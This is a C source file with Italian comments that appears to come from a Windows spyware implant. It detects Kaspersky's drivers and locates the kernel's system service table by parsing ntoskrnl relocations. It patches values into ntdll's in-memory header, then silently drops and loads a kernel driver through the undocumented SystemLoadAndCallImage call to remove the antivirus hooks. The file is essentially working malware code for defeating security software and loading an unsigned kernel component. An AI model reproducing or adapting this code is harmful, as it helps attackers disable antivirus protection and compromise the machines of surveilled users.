/*typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR  Buffer;
#endif // MIDL_PASS
} UNICODE_STRING, *PUNICODE_STRING;*/

typedef long NTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef struct _SYSTEM_MODULE_INFORMATION {//Information Class 11
    ULONG    Reserved[2];
    PVOID    Base;
    ULONG    Size;
    ULONG    Flags;
    USHORT    Index;
    USHORT    Unknown;
    USHORT    LoadCount;
    USHORT    ModuleNameOffset;
    CHAR    ImageName[256];
}SYSTEM_MODULE_INFORMATION,*PSYSTEM_MODULE_INFORMATION;

typedef struct {
    DWORD    dwNumberOfModules;
    SYSTEM_MODULE_INFORMATION    smi;
} MODULES, *PMODULES;
#define STATUS_INFO_LENGTH_MISMATCH      ((NTSTATUS)0xC0000004L)
#define SystemModuleInformation    11

NTSTATUS (__stdcall *NtQuerySystemInformation)(    
    DWORD    SystemInformationClass,
    PVOID    SystemInformation,
    ULONG    SystemInformationLength,
    PULONG    ReturnLength
    );

NTSTATUS (__stdcall *ZwSetSystemInformation)(
  IN DWORD SystemInformationClass,
  IN OUT PVOID SystemInformation,
  IN ULONG SystemInformationLength
  );

VOID (__stdcall *RtlInitUnicodeString)(
  IN OUT PUNICODE_STRING  DestinationString,
  IN PCWSTR  SourceString
  );

typedef struct _SYSTEM_LOAD_AND_CALL_IMAGE
{
 UNICODE_STRING ModuleName;
} SYSTEM_LOAD_AND_CALL_IMAGE, *PSYSTEM_LOAD_AND_CALL_IMAGE;
#define SystemLoadAndCallImage 38

#define RVATOVA(base,offset) ((PVOID)((DWORD)(base)+(DWORD)(offset)))
#define ibaseDD *(PDWORD)&ibase
#define MAGIC 0x30090000
#define DRIVER_PATH "\\??\\"
#define DRIVER_PATH2 "\\system32\\drivers\\"
#define DRIVER_NAME "MSDRV1.SYS" // XXX Si deve chiamare come il nome che ha nel driver

typedef struct {
    WORD    offset:12;
    WORD    type:4;
} IMAGE_FIXUP_ENTRY, *PIMAGE_FIXUP_ENTRY;


DWORD GetHeaders(PCHAR ibase,
                PIMAGE_FILE_HEADER *pfh,
                PIMAGE_OPTIONAL_HEADER *poh,
                PIMAGE_SECTION_HEADER *psh)

{
    PIMAGE_DOS_HEADER mzhead = (PIMAGE_DOS_HEADER)ibase;
    
    if ((mzhead->e_magic!=IMAGE_DOS_SIGNATURE) || (ibaseDD[mzhead->e_lfanew]!=IMAGE_NT_SIGNATURE))
		return FALSE;
    
    *pfh = (PIMAGE_FILE_HEADER)&ibase[mzhead->e_lfanew];
    if (((PIMAGE_NT_HEADERS)*pfh)->Signature!=IMAGE_NT_SIGNATURE) 
        return FALSE;

    *pfh = (PIMAGE_FILE_HEADER)((PBYTE)*pfh+sizeof(IMAGE_NT_SIGNATURE));
    
    *poh = (PIMAGE_OPTIONAL_HEADER)((PBYTE)*pfh+sizeof(IMAGE_FILE_HEADER));
    if ((*poh)->Magic!=IMAGE_NT_OPTIONAL_HDR32_MAGIC)
        return FALSE;
    
    *psh = (PIMAGE_SECTION_HEADER)((PBYTE)*poh+sizeof(IMAGE_OPTIONAL_HEADER));
    return TRUE;
}


DWORD FindKiServiceTable(HMODULE hModule, DWORD dwKSDT)
{
    PIMAGE_FILE_HEADER     pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER  psh;
    PIMAGE_BASE_RELOCATION pbr;
    PIMAGE_FIXUP_ENTRY     pfe;    
    
    DWORD dwFixups = 0, i, dwPointerRva, dwPointsToRva, dwKiServiceTable;
    BOOL  bFirstChunk;

    if (!GetHeaders((PCHAR)hModule, &pfh, &poh, &psh))
		return 0;

    // Cerca nella lista dei reloc per trovare la mov di inizializzazione
    if ((poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress) &&
        (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {
        
        pbr = (PIMAGE_BASE_RELOCATION)RVATOVA(poh->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress, hModule);

        bFirstChunk = TRUE;
        while (bFirstChunk || pbr->VirtualAddress) {
            bFirstChunk = FALSE;
            pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr+sizeof(IMAGE_BASE_RELOCATION));

            for (i=0;i<(pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++) {
				DWORD gino = (pbr->SizeOfBlock-sizeof(IMAGE_BASE_RELOCATION))>>1;
                if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {
                    dwFixups++;
                    dwPointerRva=pbr->VirtualAddress+pfe->offset;
                    dwPointsToRva=*(PDWORD)((DWORD)hModule+dwPointerRva)-(DWORD)poh->ImageBase;

					if (dwPointsToRva==dwKSDT) {
                        if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7) {
                            dwKiServiceTable=*(PDWORD)((DWORD)hModule+dwPointerRva+4)-poh->ImageBase;
                            return dwKiServiceTable;
                        }
                    }                  
                } 
            }
            *(PDWORD)&pbr += pbr->SizeOfBlock;
        }
    }    
    return 0;
}

void a2w(char *src, char *dst)
{
	DWORD i=0;
	do {
		dst[i*2] = src[i];
		dst[i*2+1] = 0;
	} while(src[i++]);
}

BOOL LoadDriver()
{
	SYSTEM_LOAD_AND_CALL_IMAGE mod_image;
	char sys_path[DLLNAMELEN];
	char comp_path[DLLNAMELEN*2];
	char comp_log_path[DLLNAMELEN*2];
	char wcomp_path[DLLNAMELEN*4];


	memset(sys_path, 0, sizeof(sys_path));
	memset(comp_path, 0, sizeof(comp_path));
	memset(comp_log_path, 0, sizeof(comp_log_path));
	memset(wcomp_path, 0, sizeof(wcomp_path));

	if (GetEnvironmentVariable("SystemRoot", sys_path, sizeof(sys_path)) == 0)
		return FALSE;
	sprintf(comp_path, "%s%s%s", sys_path, DRIVER_PATH2, DRIVER_NAME);
	sprintf(comp_log_path, "%s%s%s%s", DRIVER_PATH, sys_path, DRIVER_PATH2, DRIVER_NAME);

	// Copia il file dalla directory temporanea (solo la prima volta)
	// XXX Vede come si dovrebbe chiamare il file (prendendolo dal nome del file dummy)
	char *drv_scramb_name;
	if ( !(drv_scramb_name = LOG_ScrambleName(H4_DUMMY_NAME, 1, TRUE)) )
		return FALSE;
	MoveFileEx(HM_CompletePath(drv_scramb_name, sys_path), comp_path, MOVEFILE_WRITE_THROUGH);
	SAFE_FREE(drv_scramb_name);

	a2w(comp_log_path, wcomp_path);
	if (!(RtlInitUnicodeString = (void (__stdcall *)(PUNICODE_STRING,PCWSTR)) GetProcAddress(GetModuleHandle("ntdll.dll"), "RtlInitUnicodeString")))
		return FALSE;

	if (!(ZwSetSystemInformation = (NTSTATUS (__stdcall *)(DWORD,PVOID,ULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetSystemInformation")))
		return FALSE;
	RtlInitUnicodeString( &(mod_image.ModuleName), (PCWSTR)wcomp_path);

	if (!NT_SUCCESS(ZwSetSystemInformation(SystemLoadAndCallImage, &mod_image, sizeof(SYSTEM_LOAD_AND_CALL_IMAGE)))) 
		return FALSE;

	Sleep(500); // Aspetta che il driver abbia fatto il suo dovere
	return TRUE;
}

BOOL IsKaspersky()
{
	WIN32_FIND_DATA fdata;
	char buffer[DLLNAMELEN];
	HANDLE hff;

	ZeroMemory(buffer, sizeof(buffer));
	GetEnvironmentVariable("SYSTEMROOT", buffer, sizeof(buffer));
	strcat(buffer, "\\system32\\drivers\\klif.sys");
	
	hff = FindFirstFile(buffer, &fdata);
	if (hff == INVALID_HANDLE_VALUE)
		return FALSE;
	FindClose(hff);
	
	ZeroMemory(buffer, sizeof(buffer));
	GetEnvironmentVariable("SYSTEMROOT", buffer, sizeof(buffer));
	strcat(buffer, "\\system32\\drivers\\kl1.sys");

	hff = FindFirstFile(buffer, &fdata);
	if (hff == INVALID_HANDLE_VALUE) 
		return FALSE;
	FindClose(hff);

	return TRUE;
}


BOOL IsDrv()
{
	LPVOID drivers[4096];
	DWORD cbNeeded;
	int cDrivers, i;

	if( EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) { 
		char szDriver[1024];
		cDrivers = cbNeeded/sizeof(drivers[0]);
		for (i=0; i < cDrivers; i++ ) {
			if(GetDeviceDriverBaseName(drivers[i], szDriver, sizeof(szDriver)/sizeof(szDriver[0]))) { 
				if (!stricmp(szDriver, DRIVER_NAME))
					return TRUE;
			}
		}
	}
	return FALSE;
}


// XXX VA CHIAMATA DOPO LA GUESS NAME (magari dopo la clear PEB e command line)
// Se torna FALSE vuol dire che c'e' Kaspersky e non sono riuscito a fare l'unhook (potrei far
// uscire il processo in questo caso...) Non puo' fare uninstall perche' non puo' iniettare
// thread
BOOL WINAPI doUnhook()
{    
    HMODULE hKernel;
    DWORD   dwKSDT;              
    DWORD   dwKiServiceTable;    
    DWORD   dwServices = 0;
    PDWORD  pService;
	DWORD   dummy;
	DWORD	dwNeededSize;
	DWORD   *fix_add;
    PIMAGE_FILE_HEADER     pfh;
    PIMAGE_OPTIONAL_HEADER poh;
    PIMAGE_SECTION_HEADER  psh;
	PMODULES pModules=(PMODULES)&pModules;
	NTSTATUS rc;

	// XXX Se NON trova Kaspersky torna TRUE senza fare niente
	if (!IsKaspersky())
		return TRUE;

	// Se il driver e' gia' caricato ritorna TRUE senza fare niente
	if (IsDrv())
		return TRUE;

	if ( !(NtQuerySystemInformation = (NTSTATUS(__stdcall *)(DWORD,PVOID,ULONG,PULONG))GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwQuerySystemInformation")) )
		return FALSE;
	rc = NtQuerySystemInformation(SystemModuleInformation, pModules, 4, &dwNeededSize);
    if (rc == STATUS_INFO_LENGTH_MISMATCH) {
        if ( !(pModules = (PMODULES)GlobalAlloc(GPTR, dwNeededSize)) )
			return FALSE;
        rc = NtQuerySystemInformation(SystemModuleInformation, pModules, dwNeededSize, NULL);
		if (!NT_SUCCESS(rc)) {
			GlobalFree(pModules);
			return FALSE;
		}
    } else
		return FALSE;

    // Carica ntoskrnl come dll
	if ( !(hKernel = LoadLibraryEx(pModules->smi.ModuleNameOffset+pModules->smi.ImageName, 0, DONT_RESOLVE_DLL_REFERENCES)) )  {
		GlobalFree(pModules);
        return FALSE;        
	}
	GlobalFree(pModules);
	
	if (!(dwKSDT = (DWORD)GetProcAddress(hKernel, "KeServiceDescriptorTable"))) {
	    FreeLibrary(hKernel);
        return FALSE;
	}
 
    // Prende l'RVA di KeServiceDescriptorTable...
    dwKSDT -= (DWORD)hKernel;    
    // ...e cerca l'indirizzo alla ServiceTable tramite le reloc
	if (!(dwKiServiceTable = FindKiServiceTable(hKernel, dwKSDT))) {
	    FreeLibrary(hKernel);
        return FALSE;
	}

	// Legge la preferred base del kernel
	if (!GetHeaders((PCHAR)hKernel, &pfh, &poh, &psh)) {
		FreeLibrary(hKernel);
		return FALSE;
	}
	// e cerca il numero di entry nella sdt originale
	for (pService = (PDWORD)((DWORD)hKernel + dwKiServiceTable);
         *pService - poh->ImageBase < poh->SizeOfImage;
		 pService++, dwServices++);

    FreeLibrary(hKernel);

	// Scrive i parametri nell'header di ntdll
	fix_add = (DWORD *)GetModuleHandle("ntdll.dll");
	if (!VirtualProtect(fix_add, 64, PAGE_EXECUTE_READWRITE, &dummy))
		return FALSE;

	fix_add += 7;
	*fix_add = dwKiServiceTable;
	fix_add++;
	*fix_add = (dwServices | MAGIC);

	// Carica il driver
	return LoadDriver();
}
